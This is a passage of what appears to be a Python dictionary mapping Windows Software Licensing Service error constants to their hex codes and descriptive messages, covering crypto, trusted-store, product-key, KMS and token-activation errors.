'SL_REMAPPING_SP_PUB_CRYPTO_INVALID_KEYLENGTH' : (0xC004D201, 'The length of the cryptopgraphic key material/blob is invalid.'),
'SL_REMAPPING_SP_PUB_CRYPTO_INVALID_BLOCKLENGTH' : (0xC004D202, 'The block length is not correct for this algorithm.'),
'SL_REMAPPING_SP_PUB_CRYPTO_INVALID_CIPHER' : (0xC004D203, 'The Cryptopgrahic cipher/algorithm type is invalid.'),
'SL_REMAPPING_SP_PUB_CRYPTO_INVALID_CIPHERMODE' : (0xC004D204, 'The specified cipher mode is invalid. For example both encrypt and decrypt cannot be specified for symmetric keys.'),
'SL_REMAPPING_SP_PUB_CRYPTO_UNKNOWN_PROVIDERID' : (0xC004D205, 'The SPAPIID for the specified Cryptographic Provider is unknown.'),
'SL_REMAPPING_SP_PUB_CRYPTO_UNKNOWN_KEYID' : (0xC004D206, 'The SPAPIID for the specified Cryptographic Key (type) is unknown.'),
'SL_REMAPPING_SP_PUB_CRYPTO_UNKNOWN_HASHID' : (0xC004D207, 'The SPAPIID for the specified Cryptographic Hash is unknown.'),
'SL_REMAPPING_SP_PUB_CRYPTO_UNKNOWN_ATTRIBUTEID' : (0xC004D208, 'The SPAPIID for the specified Cryptographic Attribute is unknown.'),
'SL_REMAPPING_SP_PUB_CRYPTO_HASH_FINALIZED' : (0xC004D209, 'The hash object has been finalized and can no longer be updated.'),
'SL_REMAPPING_SP_PUB_CRYPTO_KEY_NOT_AVAILABLE' : (0xC004D20A, 'The key is not available within the current state.'),
'SL_REMAPPING_SP_PUB_CRYPTO_KEY_NOT_FOUND' : (0xC004D20B, 'The key does not exist. It may not have have been created yet.'),
'SL_REMAPPING_SP_PUB_CRYPTO_NOT_BLOCK_ALIGNED' : (0xC004D20C, "The data length is not a multiple of the algorithm's block length."),
'SL_REMAPPING_SP_PUB_CRYPTO_INVALID_SIGNATURELENGTH' : (0xC004D20D, 'The length of the signature is not valid.'),
'SL_REMAPPING_SP_PUB_CRYPTO_INVALID_SIGNATURE' : (0xC004D20E, 'The signature does not correlate with the comparison hash.'),
'SL_REMAPPING_SP_PUB_CRYPTO_INVALID_BLOCK' : (0xC004D20F, 'The RSA block is not valid.'),
'SL_REMAPPING_SP_PUB_CRYPTO_INVALID_FORMAT' : (0xC004D210, 'The format of the RSA block is not valid.'),
'SL_REMAPPING_SP_PUB_CRYPTO_INVALID_PADDING' : (0xC004D211, 'The CBC padding is not valid.'),
'SL_REMAPPING_SP_PUB_TS_TAMPERED' : (0xC004D301, 'The security processor reported that the trusted data store was tampered.'),
'SL_REMAPPING_SP_PUB_TS_REARMED' : (0xC004D302, 'The security processor reported that the trusted data store was rearmed.'),
'SL_REMAPPING_SP_PUB_TS_RECREATED' : (0xC004D303, 'The security processor reported that the trusted store has been recreated.'),
'SL_REMAPPING_SP_PUB_TS_ENTRY_KEY_NOT_FOUND' : (0xC004D304, 'The security processor reported that entry key was not found in the trusted data store.'),
'SL_REMAPPING_SP_PUB_TS_ENTRY_KEY_ALREADY_EXISTS' : (0xC004D305, 'The security processor reported that the entry key already exists in the trusted data store.'),
'SL_REMAPPING_SP_PUB_TS_ENTRY_KEY_SIZE_TOO_BIG' : (0xC004D306, 'The security processor reported that the entry key is too big to fit in the trusted data store.'),
'SL_REMAPPING_SP_PUB_TS_MAX_REARM_REACHED' : (0xC004D307, 'The security processor reported that the maximum allowed number of re-arms has been exceeded. You must re-install the OS before trying to re-arm again.'),
'SL_REMAPPING_SP_PUB_TS_DATA_SIZE_TOO_BIG' : (0xC004D308, 'The security processor has reported that entry data size is too big to fit in the trusted data store.'),
'SL_REMAPPING_SP_PUB_TS_INVALID_HW_BINDING' : (0xC004D309, 'The security processor has reported that the machine has gone out of hardware tolerance.'),
'SL_REMAPPING_SP_PUB_TIMER_ALREADY_EXISTS' : (0xC004D30A, 'The security processor has reported that the secure timer already exists.'),
'SL_REMAPPING_SP_PUB_TIMER_NOT_FOUND' : (0xC004D30B, 'The security processor has reported that the secure timer was not found.'),
'SL_REMAPPING_SP_PUB_TIMER_EXPIRED' : (0xC004D30C, 'The security processor has reported that the secure timer has expired.'),
'SL_REMAPPING_SP_PUB_TIMER_NAME_SIZE_TOO_BIG' : (0xC004D30D, 'The security processor has reported that the secure timer name is too long.'),
'SL_REMAPPING_SP_PUB_TS_FULL' : (0xC004D30E, 'The security processor reported that the trusted data store is full.'),
'SL_REMAPPING_SP_PUB_TRUSTED_TIME_OK' : (0x4004D30F, 'Trusted time is already up-to-date.'),
'SL_REMAPPING_SP_PUB_TS_ENTRY_READ_ONLY' : (0xC004D310, 'Read-only entry cannot be modified.'),
'SL_REMAPPING_SP_PUB_TIMER_READ_ONLY' : (0xC004D311, 'Read-only timer cannot be modified.'),
'SL_REMAPPING_SP_PUB_TS_ATTRIBUTE_READ_ONLY' : (0xC004D312, 'Read-only attribute cannot be modified.'),
'SL_REMAPPING_SP_PUB_TS_ATTRIBUTE_NOT_FOUND' : (0xC004D313, 'Attribute not found.'),
'SL_REMAPPING_SP_PUB_TS_ACCESS_DENIED' : (0xC004D314, 'Trusted Store access denied.'),
'SL_REMAPPING_SP_PUB_TS_NAMESPACE_NOT_FOUND' : (0xC004D315, 'Namespace not found.'),
'SL_REMAPPING_SP_PUB_TS_NAMESPACE_IN_USE' : (0xC004D316, 'Namespace in use.'),
'SL_REMAPPING_SP_PUB_TS_TAMPERED_BREADCRUMB_LOAD_INVALID' : (0xC004D317, 'Trusted store tampered.'),
'SL_REMAPPING_SP_PUB_TS_TAMPERED_BREADCRUMB_GENERATION' : (0xC004D318, 'Trusted store tampered.'),
'SL_REMAPPING_SP_PUB_TS_TAMPERED_INVALID_DATA' : (0xC004D319, 'Trusted store tampered.'),
'SL_REMAPPING_SP_PUB_TS_TAMPERED_NO_DATA' : (0xC004D31A, 'Trusted store tampered.'),
'SL_REMAPPING_SP_PUB_TS_TAMPERED_DATA_BREADCRUMB_MISMATCH' : (0xC004D31B, 'Trusted store tampered'),
'SL_REMAPPING_SP_PUB_TS_TAMPERED_DATA_VERSION_MISMATCH' : (0xC004D31C, 'Trusted store tampered.'),
'SL_REMAPPING_SP_PUB_TAMPER_MODULE_AUTHENTICATION' : (0xC004D401, 'The security processor reported a system file mismatch error.'),
'SL_REMAPPING_SP_PUB_TAMPER_SECURITY_PROCESSOR_PATCHED' : (0xC004D402, 'The security processor reported a system file mismatch error.'),
'SL_REMAPPING_SP_PUB_KM_CACHE_TAMPER' : (0xC004D501, 'The security processor reported an error with the kernel data.'),
'SL_REMAPPING_SP_PUB_KM_CACHE_TAMPER_RESTORE_FAILED' : (0xC004D502, 'Kernel Mode Cache is tampered and the restore attempt failed.'),
'SL_REMAPPING_SP_PUB_KM_CACHE_IDENTICAL' : (0x4004D601, 'Kernel Mode Cache was not changed.'),
'SL_REMAPPING_SP_PUB_KM_CACHE_POLICY_CHANGED' : (0x4004D602, 'Reboot-requiring policies have changed.'),
'SL_REMAPPING_SP_STATUS_PUSHKEY_CONFLICT' : (0xC004D701, 'External decryption key was already set for specified feature.'),
'SL_REMAPPING_SP_PUB_PROXY_SOFT_TAMPER' : (0xC004D702, 'Error occured during proxy execution'),
'SL_E_INVALID_CONTEXT' : (0xC004E001, 'The Software Licensing Service determined that the specified context is invalid.'),
'SL_E_TOKEN_STORE_INVALID_STATE' : (0xC004E002, 'The Software Licensing Service reported that the license store contains inconsistent data.'),
'SL_E_EVALUATION_FAILED' : (0xC004E003, 'The Software Licensing Service reported that license evaluation failed.'),
'SL_E_NOT_EVALUATED' : (0xC004E004, 'The Software Licensing Service reported that the license has not been evaluated.'),
'SL_E_NOT_ACTIVATED' : (0xC004E005, 'The Software Licensing Service reported that the license is not activated.'),
'SL_E_INVALID_GUID' : (0xC004E006, 'The Software Licensing Service reported that the license contains invalid data.'),
'SL_E_TOKSTO_TOKEN_NOT_FOUND' : (0xC004E007, 'The Software Licensing Service reported that the license store does not contain the requested license.'),
'SL_E_TOKSTO_NO_PROPERTIES' : (0xC004E008, 'The Software Licensing Service reported that the license property is invalid.'),
'SL_E_TOKSTO_NOT_INITIALIZED' : (0xC004E009, 'The Software Licensing Service reported that the license store is not initialized.'),
'SL_E_TOKSTO_ALREADY_INITIALIZED' : (0xC004E00A, 'The Software Licensing Service reported that the license store is already initialized.'),
'SL_E_TOKSTO_NO_ID_SET' : (0xC004E00B, 'The Software Licensing Service reported that the license property is invalid.'),
'SL_E_TOKSTO_CANT_CREATE_FILE' : (0xC004E00C, 'The Software Licensing Service reported that the license could not be opened or created.'),
'SL_E_TOKSTO_CANT_WRITE_TO_FILE' : (0xC004E00D, 'The Software Licensing Service reported that the license could not be written.'),
'SL_E_TOKSTO_CANT_READ_FILE' : (0xC004E00E, 'The Software Licensing Service reported that the license store could not read the license file.'),
'SL_E_TOKSTO_CANT_PARSE_PROPERTIES' : (0xC004E00F, 'The Software Licensing Service reported that the license property is corrupted.'),
'SL_E_TOKSTO_PROPERTY_NOT_FOUND' : (0xC004E010, 'The Software Licensing Service reported that the license property is missing.'),
'SL_E_TOKSTO_INVALID_FILE' : (0xC004E011, 'The Software Licensing Service reported that the license store contains an invalid license file.'),
'SL_E_TOKSTO_CANT_CREATE_MUTEX' : (0xC004E012, 'The Software Licensing Service reported that the license store failed to start synchronization properly.'),
'SL_E_TOKSTO_CANT_ACQUIRE_MUTEX' : (0xC004E013, 'The Software Licensing Service reported that the license store failed to synchronize properly.'),
'SL_E_TOKSTO_NO_TOKEN_DATA' : (0xC004E014, 'The Software Licensing Service reported that the license property is invalid.'),
'SL_E_EUL_CONSUMPTION_FAILED' : (0xC004E015, 'The Software Licensing Service reported that license consumption failed.'),
'SL_E_PKEY_INVALID_CONFIG' : (0xC004E016, 'The Software Licensing Service reported that the product key is invalid.'),
'SL_E_PKEY_INVALID_UNIQUEID' : (0xC004E017, 'The Software Licensing Service reported that the product key is invalid.'),
'SL_E_PKEY_INVALID_ALGORITHM' : (0xC004E018, 'The Software Licensing Service reported that the product key is invalid.'),
'SL_E_PKEY_INTERNAL_ERROR' : (0xC004E019, 'The Software Licensing Service determined that validation of the specified product key failed.'),
'SL_E_LICENSE_INVALID_ADDON_INFO' : (0xC004E01A, 'The Software Licensing Service reported that invalid add-on information was found.'),
'SL_E_HWID_ERROR' : (0xC004E01B, 'The Software Licensing Service reported that not all hardware information could be collected.'),
'SL_E_PKEY_INVALID_KEYCHANGE1' : (0xC004E01C, 'This evaluation product key is no longer valid.'),
'SL_E_PKEY_INVALID_KEYCHANGE2' : (0xC004E01D, 'The new product key cannot be used on this installation of Windows. Type a different product key. (CD-AB)'),
'SL_E_PKEY_INVALID_KEYCHANGE3' : (0xC004E01E, 'The new product key cannot be used on this installation of Windows. Type a different product key. (AB-AB)'),
'SL_E_POLICY_OTHERINFO_MISMATCH' : (0xC004E020, 'The Software Licensing Service reported that there is a mismatched between a policy value and information stored in the OtherInfo section.'),
'SL_E_PRODUCT_UNIQUENESS_GROUP_ID_INVALID' : (0xC004E021, 'The Software Licensing Service reported that the Genuine information contained in the license is not consistent.'),
'SL_E_SECURE_STORE_ID_MISMATCH' : (0xC004E022, 'The Software Licensing Service reported that the secure store id value in license does not match with the current value.'),
'SL_E_INVALID_RULESET_RULE' : (0xC004E023, 'The Software Licensing Service reported that the notification rules appear to be invalid.'),
'SL_E_INVALID_CONTEXT_DATA' : (0xC004E024, 'The Software Licensing Service reported that the reported machine data appears to be invalid.'),
'SL_E_INVALID_HASH' : (0xC004E025, 'The Software Licensing Service reported that the data hash does not correspond to the data.'),
'SL_E_INVALID_USE_OF_ADD_ON_PKEY' : (0x8004E026, 'The Software Licensing Service reported that a valid product key for an add-on sku was entered where a Windows product key was expected.'),
'SL_E_WINDOWS_VERSION_MISMATCH' : (0xC004E027, 'The Software Licensing Service reported that the version of SPPSvc does not match the policy.'),
'SL_E_ACTIVATION_IN_PROGRESS' : (0xC004E028, 'The Software Licensing Service reported that there is another activation attempt in progress for this sku. Please wait for that attempt to complete before trying again.'),
'SL_E_STORE_UPGRADE_TOKEN_REQUIRED' : (0xC004E029, 'The Software Licensing Service reported that the activated license requires a corresponding Store upgrade license in order to work. Please visit the Store to purchase a new license or re-download an existing one.'),
'SL_E_STORE_UPGRADE_TOKEN_WRONG_EDITION' : (0xC004E02A, 'The Software Licensing Service reported that the Store upgrade license is not enabled for the current OS edition. Please visit the Store to purchase the appropriate license.'),
'SL_E_STORE_UPGRADE_TOKEN_WRONG_PID' : (0xC004E02B, 'The Software Licensing Service reported that the Store upgrade license does not match the current active product key. Please visit the Store to purchase a new license or re-download an existing one.'),
'SL_E_STORE_UPGRADE_TOKEN_NOT_PRS_SIGNED' : (0xC004E02C, 'The Software Licensing Service reported that the Store upgrade license does not match the current signing level for the installed Operating System. Please visit the Store to purchase a new license or re-download an existing one.'),
'SL_E_STORE_UPGRADE_TOKEN_WRONG_VERSION' : (0xC004E02D, 'The Software Licensing Service reported that the Store upgrade license does not enable the current version of the installed Operating System. Please visit the Store to purchase a new license or re-download an existing one.'),
'SL_E_STORE_UPGRADE_TOKEN_NOT_AUTHORIZED' : (0xC004E02E, 'The Software Licensing Service reported that the Store upgrade license could not be authorized. Please visit the Store to purchase a new license or re-download an existing one.'),
'SL_E_SFS_INVALID_FS_VERSION' : (0x8004E101, 'The Software Licensing Service reported that the Token Store file version is invalid.'),
'SL_E_SFS_INVALID_FD_TABLE' : (0x8004E102, 'The Software Licensing Service reported that the Token Store contains an invalid descriptor table.'),
'SL_E_SFS_INVALID_SYNC' : (0x8004E103, 'The Software Licensing Service reported that the Token Store contains a token with an invalid header/footer.'),
'SL_E_SFS_BAD_TOKEN_NAME' : (0x8004E104, 'The Software Licensing Service reported that a Token Store token has an invalid name.'),
'SL_E_SFS_BAD_TOKEN_EXT' : (0x8004E105, 'The Software Licensing Service reported that a Token Store token has an invalid extension.'),
'SL_E_SFS_DUPLICATE_TOKEN_NAME' : (0x8004E106, 'The Software Licensing Service reported that the Token Store contains a duplicate token.'),
'SL_E_SFS_TOKEN_SIZE_MISMATCH' : (0x8004E107, 'The Software Licensing Service reported that a token in the Token Store has a size mismatch.'),
'SL_E_SFS_INVALID_TOKEN_DATA_HASH' : (0x8004E108, 'The Software Licensing Service reported that a token in the Token Store contains an invalid hash.'),
'SL_E_SFS_FILE_READ_ERROR' : (0x8004E109, 'The Software Licensing Service reported that the Token Store was unable to read a token.'),
'SL_E_SFS_FILE_WRITE_ERROR' : (0x8004E10A, 'The Software Licensing Service reported that the Token Store was unable to write a token.'),
'SL_E_SFS_INVALID_FILE_POSITION' : (0x8004E10B, 'The Software Licensing Service reported that the Token Store attempted an invalid file operation.'),
'SL_E_SFS_NO_ACTIVE_TRANSACTION' : (0x8004E10C, 'The Software Licensing Service reported that there is no active transaction.'),
'SL_E_SFS_INVALID_FS_HEADER' : (0x8004E10D, 'The Software Licensing Service reported that the Token Store file header is invalid.'),
'SL_E_SFS_INVALID_TOKEN_DESCRIPTOR' : (0x8004E10E, 'The Software Licensing Service reported that a Token Store token descriptor is invalid.'),
'SL_E_INTERNAL_ERROR' : (0xC004F001, 'The Software Licensing Service reported an internal error.'),
'SL_E_RIGHT_NOT_CONSUMED' : (0xC004F002, 'The Software Licensing Service reported that rights consumption failed.'),
'SL_E_USE_LICENSE_NOT_INSTALLED' : (0xC004F003, 'The Software Licensing Service reported that the required license could not be found.'),
'SL_E_MISMATCHED_PKEY_RANGE' : (0xC004F004, 'The Software Licensing Service reported that the product key does not match the range defined in the license.'),
'SL_E_MISMATCHED_PID' : (0xC004F005, 'The Software Licensing Service reported that the product key does not match the product key for the license.'),
'SL_E_EXTERNAL_SIGNATURE_NOT_FOUND' : (0xC004F006, 'The Software Licensing Service reported that the signature file for the license is not available.'),
'SL_E_RAC_NOT_AVAILABLE' : (0xC004F007, 'The Software Licensing Service reported that the license could not be found.'),
'SL_E_SPC_NOT_AVAILABLE' : (0xC004F008, 'The Software Licensing Service reported that the license could not be found.'),
'SL_E_GRACE_TIME_EXPIRED' : (0xC004F009, 'The Software Licensing Service reported that the grace period expired.'),
'SL_E_MISMATCHED_APPID' : (0xC004F00A, 'The Software Licensing Service reported that the application ID does not match the application ID for the license.'),
'SL_E_NO_PID_CONFIG_DATA' : (0xC004F00B, 'The Software Licensing Service reported that the product identification data is not available.'),
'SL_I_OOB_GRACE_PERIOD' : (0x4004F00C, 'The Software Licensing Service reported that the application is running within the valid grace period.'),
'SL_I_OOT_GRACE_PERIOD' : (0x4004F00D, 'The Software Licensing Service reported that the application is running within the valid out of tolerance grace period.'),
'SL_E_MISMATCHED_SECURITY_PROCESSOR' : (0xC004F00E, 'The Software Licensing Service determined that the license could not be used by the current version of the security processor component.'),
'SL_E_OUT_OF_TOLERANCE' : (0xC004F00F, 'The Software Licensing Service reported that the hardware ID binding is beyond the level of tolerance.'),
'SL_E_INVALID_PKEY' : (0xC004F010, 'The Software Licensing Service reported that the product key is invalid.'),
'SL_E_LICENSE_FILE_NOT_INSTALLED' : (0xC004F011, 'The Software Licensing Service reported that the license file is not installed.'),
'SL_E_VALUE_NOT_FOUND' : (0xC004F012, 'The Software Licensing Service reported that the call has failed because the value for the input key was not found.'),
'SL_E_RIGHT_NOT_GRANTED' : (0xC004F013, 'The Software Licensing Service determined that there is no permission to run the software.'),
'SL_E_PKEY_NOT_INSTALLED' : (0xC004F014, 'The Software Licensing Service reported that the product key is not available.'),
'SL_E_PRODUCT_SKU_NOT_INSTALLED' : (0xC004F015, 'The Software Licensing Service reported that the license is not installed.'),
'SL_E_NOT_SUPPORTED' : (0xC004F016, 'The Software Licensing Service determined that the request is not supported.'),
'SL_E_PUBLISHING_LICENSE_NOT_INSTALLED' : (0xC004F017, 'The Software Licensing Service reported that the license is not installed.'),
'SL_E_LICENSE_SERVER_URL_NOT_FOUND' : (0xC004F018, 'The Software Licensing Service reported that the license does not contain valid location data for the activation server.'),
'SL_E_INVALID_EVENT_ID' : (0xC004F019, 'The Software Licensing Service determined that the requested event ID is invalid.'),
'SL_E_EVENT_NOT_REGISTERED' : (0xC004F01A, 'The Software Licensing Service determined that the requested event is not registered with the service.'),
'SL_E_EVENT_ALREADY_REGISTERED' : (0xC004F01B, 'The Software Licensing Service reported that the event ID is already registered.'),
'SL_E_DECRYPTION_LICENSES_NOT_AVAILABLE' : (0xC004F01C, 'The Software Licensing Service reported that the license is not installed.'),
'SL_E_LICENSE_SIGNATURE_VERIFICATION_FAILED' : (0xC004F01D, 'The Software Licensing Service reported that the verification of the license failed.'),
'SL_E_DATATYPE_MISMATCHED' : (0xC004F01E, 'The Software Licensing Service determined that the input data type does not match the data type in the license.'),
'SL_E_INVALID_LICENSE' : (0xC004F01F, 'The Software Licensing Service determined that the license is invalid.'),
'SL_E_INVALID_PACKAGE' : (0xC004F020, 'The Software Licensing Service determined that the license package is invalid.'),
'SL_E_VALIDITY_TIME_EXPIRED' : (0xC004F021, 'The Software Licensing Service reported that the validity period of the license has expired.'),
'SL_E_LICENSE_AUTHORIZATION_FAILED' : (0xC004F022, 'The Software Licensing Service reported that the license authorization failed.'),
'SL_E_LICENSE_DECRYPTION_FAILED' : (0xC004F023, 'The Software Licensing Service reported that the license is invalid.'),
'SL_E_WINDOWS_INVALID_LICENSE_STATE' : (0xC004F024, 'The Software Licensing Service reported that the license is invalid.'),
'SL_E_LUA_ACCESSDENIED' : (0xC004F025, 'The Software Licensing Service reported that the action requires administrator privilege.'),
'SL_E_PROXY_KEY_NOT_FOUND' : (0xC004F026, 'The Software Licensing Service reported that the required data is not found.'),
'SL_E_TAMPER_DETECTED' : (0xC004F027, 'The Software Licensing Service reported that the license is tampered.'),
'SL_E_POLICY_CACHE_INVALID' : (0xC004F028, 'The Software Licensing Service reported that the policy cache is invalid.'),
'SL_E_INVALID_RUNNING_MODE' : (0xC004F029, 'The Software Licensing Service cannot be started in the current OS mode.'),
'SL_E_SLP_NOT_SIGNED' : (0xC004F02A, 'The Software Licensing Service reported that the license is invalid.'),
'SL_E_CIDIID_INVALID_DATA' : (0xC004F02C, 'The Software Licensing Service reported that the format for the offline activation data is incorrect.'),
'SL_E_CIDIID_INVALID_VERSION' : (0xC004F02D, 'The Software Licensing Service determined that the version of the offline Confirmation ID (CID) is incorrect.'),
'SL_E_CIDIID_VERSION_NOT_SUPPORTED' : (0xC004F02E, 'The Software Licensing Service determined that the version of the offline Confirmation ID (CID) is not supported.'),
'SL_E_CIDIID_INVALID_DATA_LENGTH' : (0xC004F02F, 'The Software Licensing Service reported that the length of the offline Confirmation ID (CID) is incorrect.'),
'SL_E_CIDIID_NOT_DEPOSITED' : (0xC004F030, 'The Software Licensing Service determined that the Installation ID (IID) or the Confirmation ID (CID) could not been saved.'),
'SL_E_CIDIID_MISMATCHED' : (0xC004F031, 'The Installation ID (IID) and the Confirmation ID (CID) do not match. Please confirm the IID and reacquire a new CID if necessary.'),
'SL_E_INVALID_BINDING_BLOB' : (0xC004F032, 'The Software Licensing Service determined that the binding data is invalid.'),
'SL_E_PRODUCT_KEY_INSTALLATION_NOT_ALLOWED' : (0xC004F033, 'The Software Licensing Service reported that the product key is not allowed to be installed. Please see the eventlog for details.'),
'SL_E_EUL_NOT_AVAILABLE' : (0xC004F034, 'The Software Licensing Service reported that the license could not be found or was invalid.'),
'SL_E_VL_NOT_WINDOWS_SLP' : (0xC004F035, 'The Software Licensing Service reported that the computer could not be activated with a Volume license product key. Volume-licensed systems require upgrading from a qualifying operating system. Please contact your system administrator or use a different type of key.'),
'SL_E_VL_NOT_ENOUGH_COUNT' : (0xC004F038, 'The Software Licensing Service reported that the product could not be activated. The count reported by your Key Management Service (KMS) is insufficient. Please contact your system administrator.'),
'SL_E_VL_BINDING_SERVICE_NOT_ENABLED' : (0xC004F039, 'The Software Licensing Service reported that the product could not be activated. The Key Management Service (KMS) is not enabled.'),
'SL_E_VL_INFO_PRODUCT_USER_RIGHT' : (0x4004F040, 'The Software Licensing Service reported that the product was activated but the owner should verify the Product Use Rights.'),
'SL_E_VL_KEY_MANAGEMENT_SERVICE_NOT_ACTIVATED' : (0xC004F041, 'The Software Licensing Service determined that the Key Management Service (KMS) is not activated. KMS needs to be activated. Please contact system administrator.'),
'SL_E_VL_KEY_MANAGEMENT_SERVICE_ID_MISMATCH' : (0xC004F042, 'The Software Licensing Service determined that the specified Key Management Service (KMS) cannot be used.'),
'SL_E_PROXY_POLICY_NOT_UPDATED' : (0xC004F047, 'The Software Licensing Service reported that the proxy policy has not been updated.'),
'SL_E_CIDIID_INVALID_CHECK_DIGITS' : (0xC004F04D, 'The Software Licensing Service determined that the Installation ID (IID) or the Confirmation ID (CID) is invalid.'),
'SL_E_LICENSE_MANAGEMENT_DATA_NOT_FOUND' : (0xC004F04F, 'The Software Licensing Service reported that license management information was not found in the licenses.'),
'SL_E_INVALID_PRODUCT_KEY' : (0xC004F050, 'The Software Licensing Service reported that the product key is invalid.'),
'SL_E_BLOCKED_PRODUCT_KEY' : (0xC004F051, 'The Software Licensing Service reported that the product key is blocked.'),
'SL_E_DUPLICATE_POLICY' : (0xC004F052, 'The Software Licensing Service reported that the licenses contain duplicated properties.'),
'SL_E_MISSING_OVERRIDE_ONLY_ATTRIBUTE' : (0xC004F053, 'The Software Licensing Service determined that the license is invalid. The license contains an override policy that is not configured properly.'),
'SL_E_LICENSE_MANAGEMENT_DATA_DUPLICATED' : (0xC004F054, 'The Software Licensing Service reported that license management information has duplicated data.'),
'SL_E_BASE_SKU_NOT_AVAILABLE' : (0xC004F055, 'The Software Licensing Service reported that the base SKU is not available.'),
'SL_E_VL_MACHINE_NOT_BOUND' : (0xC004F056, 'The Software Licensing Service reported that the product could not be activated using the Key Management Service (KMS).'),
'SL_E_SLP_MISSING_ACPI_SLIC' : (0xC004F057, 'The Software Licensing Service reported that the computer BIOS is missing a required license.'),
'SL_E_SLP_MISSING_SLP_MARKER' : (0xC004F058, 'The Software Licensing Service reported that the computer BIOS is missing a required license.'),
'SL_E_SLP_BAD_FORMAT' : (0xC004F059, 'The Software Licensing Service reported that a license in the computer BIOS is invalid.'),
'SL_E_INVALID_PACKAGE_VERSION' : (0xC004F060, 'The Software Licensing Service determined that the version of the license package is invalid.'),
'SL_E_PKEY_INVALID_UPGRADE' : (0xC004F061, 'The Software Licensing Service determined that this specified product key can only be used for upgrading, not for clean installations.'),
'SL_E_ISSUANCE_LICENSE_NOT_INSTALLED' : (0xC004F062, 'The Software Licensing Service reported that a required license could not be found.'),
'SL_E_SLP_OEM_CERT_MISSING' : (0xC004F063, 'The Software Licensing Service reported that the computer is missing a required OEM license.'),
'SL_E_NONGENUINE_GRACE_TIME_EXPIRED' : (0xC004F064, 'The Software Licensing Service reported that the non-genuine grace period expired.'),
'SL_I_NONGENUINE_GRACE_PERIOD' : (0x4004F065, 'The Software Licensing Service reported that the application is running within the valid non-genuine grace period.'),
'SL_E_DEPENDENT_PROPERTY_NOT_SET' : (0xC004F066, 'The Software Licensing Service reported that the genuine information property can not be set before dependent property been set.'),
'SL_E_NONGENUINE_GRACE_TIME_EXPIRED_2' : (0xC004F067, 'The Software Licensing Service reported that the non-genuine grace period expired (type 2).'),
'SL_I_NONGENUINE_GRACE_PERIOD_2' : (0x4004F068, 'The Software Licensing Service reported that the application is running within the valid non-genuine grace period (type 2).'),
'SL_E_MISMATCHED_PRODUCT_SKU' : (0xC004F069, 'The Software Licensing Service reported that the product SKU is not found.'),
'SL_E_OPERATION_NOT_ALLOWED' : (0xC004F06A, 'The Software Licensing Service reported that the requested operation is not allowed.'),
'SL_E_VL_KEY_MANAGEMENT_SERVICE_VM_NOT_SUPPORTED' : (0xC004F06B, 'The Software Licensing Service determined that it is running in a virtual machine. The Key Management Service (KMS) is not supported in this mode.'),
'SL_E_VL_INVALID_TIMESTAMP' : (0xC004F06C, 'The Software Licensing Service reported that the product could not be activated. The Key Management Service (KMS) determined that the request timestamp is invalid.'),
'SL_E_PLUGIN_INVALID_MANIFEST' : (0xC004F071, 'The Software Licensing Service reported that the plug-in manifest file is incorrect.'),
'SL_E_APPLICATION_POLICIES_MISSING' : (0xC004F072, 'The Software Licensing Service reported that the license policies for fast query could not be found.'),
'SL_E_APPLICATION_POLICIES_NOT_LOADED' : (0xC004F073, 'The Software Licensing Service reported that the license policies for fast query have not been loaded.'),
'SL_E_VL_BINDING_SERVICE_UNAVAILABLE' : (0xC004F074, 'The Software Licensing Service reported that the product could not be activated. No Key Management Service (KMS) could be contacted. Please see the Application Event Log for additional information.'),
'SL_E_SERVICE_STOPPING' : (0xC004F075, 'The Software Licensing Service reported that the operation cannot be completed because the service is stopping.'),
'SL_E_PLUGIN_NOT_REGISTERED' : (0xC004F076, 'The Software Licensing Service reported that the requested plug-in cannot be found.'),
'SL_E_AUTHN_WRONG_VERSION' : (0xC004F077, 'The Software Licensing Service determined incompatible version of authentication data.'),
'SL_E_AUTHN_MISMATCHED_KEY' : (0xC004F078, 'The Software Licensing Service reported that the key is mismatched.'),
'SL_E_AUTHN_CHALLENGE_NOT_SET' : (0xC004F079, 'The Software Licensing Service reported that the authentication data is not set.'),
'SL_E_AUTHN_CANT_VERIFY' : (0xC004F07A, 'The Software Licensing Service reported that the verification could not be done.'),
'SL_E_SERVICE_RUNNING' : (0xC004F07B, 'The requested operation is unavailable while the Software Licensing Service is running.'),
'SL_E_SLP_INVALID_MARKER_VERSION' : (0xC004F07C, 'The Software Licensing Service determined that the version of the computer BIOS is invalid.'),
'SL_E_INVALID_PRODUCT_KEY_TYPE' : (0xC004F07D, 'The Software Licensing Service reported that the product key cannot be used for this type of activation.'),
'SL_E_CIDIID_MISMATCHED_PKEY' : (0xC004F07E, 'The Installation ID (IID) and the Confirmation ID (CID) do not match the product key.'),
'SL_E_CIDIID_NOT_BOUND' : (0xC004F07F, 'The Installation ID (IID) and the Confirmation ID (CID) are not bound to the current environment.'),
'SL_E_LICENSE_NOT_BOUND' : (0xC004F080, 'The Software Licensing Service reported that the license is not bound to the current environment.'),
'SL_E_VL_AD_AO_NOT_FOUND' : (0xC004F081, 'The Software Licensing Service reported that the Active Directory Activation Object could not be found or was invalid.'),
'SL_E_VL_AD_AO_NAME_TOO_LONG' : (0xC004F082, 'The Software Licensing Service reported that the name specified for the Active Directory Activation Object is too long.'),
'SL_E_VL_AD_SCHEMA_VERSION_NOT_SUPPORTED' : (0xC004F083, 'The Software Licensing Service reported that Active Directory-Based Activation is not supported in the current Active Directory schema.'),
'SL_E_NOT_GENUINE' : (0xC004F200, 'The Software Licensing Service reported that current state is not genuine.'),
'SL_E_EDITION_MISMATCHED' : (0xC004F210, 'The Software Licensing Service reported that the license edition does match the computer edition.'),
'SL_E_TKA_CHALLENGE_EXPIRED' : (0xC004F301, 'The Software Licensing Service reported that the product could not be activated. The token-based activation challenge has expired.'),
'SL_E_TKA_SILENT_ACTIVATION_FAILURE' : (0xC004F302, 'The Software Licensing Service reported that Silent Activation failed. The Software Licensing Service reported that there are no certificates found in the system that could activate the product without user interaction.'),
'SL_E_TKA_INVALID_CERT_CHAIN' : (0xC004F303, 'The Software Licensing Service reported that the certificate chain could not be built or failed validation.'),
'SL_E_TKA_GRANT_NOT_FOUND' : (0xC004F304, 'The Software Licensing Service reported that required license could not be found.'),
'SL_E_TKA_CERT_NOT_FOUND' : (0xC004F305, 'The Software Licensing Service reported that there are no certificates found in the system that could activate the product.'),
'SL_E_TKA_INVALID_SKU_ID' : (0xC004F306, 'The Software Licensing Service reported that this software edition does not support token-based activation.'),
'SL_E_TKA_INVALID_BLOB' : (0xC004F307, 'The Software Licensing Service reported that the product could not be activated. Activation data is invalid.'),
'SL_E_TKA_TAMPERED_CERT_CHAIN' : (0xC004F308, 'The Software Licensing Service reported that the product could not be activated. Activation data is tampered.'),
